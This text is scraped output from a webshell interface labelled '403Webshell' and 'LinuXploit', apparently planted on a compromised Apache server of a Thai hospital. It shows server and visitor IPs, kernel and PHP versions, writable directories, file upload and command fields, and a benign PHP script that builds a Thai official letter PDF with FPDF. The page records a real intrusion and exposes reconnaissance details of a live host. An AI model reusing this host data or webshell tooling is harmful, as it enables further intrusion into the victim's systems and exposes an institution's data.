403Webshell
Server IP : 182.53.201.61  /  Your IP : 216.73.217.175
Web Server : Apache/2.2.15 (Fedora)
System : Linux km10.dyndns.org 2.6.31.5-127.fc12.i686.PAE #1 SMP Sat Nov 7 21:25:57 EST 2009 i686
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/CAR/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/CAR/genpdf.php
<?php
$ebits = ini_get('error_reporting');
error_reporting($ebits ^ E_NOTICE);
?>

<?php
define('FPDF_font_path','font/');
//require('template.php');
require('fpdf.php');
//
$no = "001";
$add = "รพ.สัตหีบ กม.10 " ;
$date = date("d/m/").(date("Y")+543);
$subject = "แต่งตั้งคณะกรรมการทำงานตามโครงการพัฒนาระบบจัดสรรงบประมาณ";
//
$pdf=new FPDF( 'P', 'mm', 'A4' );
$pdf->Open();
$pdf->AddPage();
$pdf->AddFont('angsa','','angsa.php');
$pdf->SetFont('angsa','',16);
$pdf->Text('20','30',"ที่ ชบ.");
$pdf->Text('30','30',$no);
$pdf->Text('150','30',$add);
$pdf->Text('150','35',"ตำบลพลูตาหลวง อ.สัตหีบ");
$pdf->Text('150','40',"จังหวัดชลบุรี 20180");
$pdf->Text('100','55',$date);
$pdf->Text('20','65',"เรื่อง");
$pdf->Text('30','65',$subject);
$pdf->Text('20','75',"เรียน");
$pdf->Text('30','75',"ผู้อำนวยโรงพยาบาล");

$pdf->Text('100','200',"ขอแสดงความนับถือ");
$pdf->Text('100','220',"( สญชัย       วัฒนา )");

$pdf->Output();
?>

Youez - 2016 - github.com/yon3zu
LinuXploit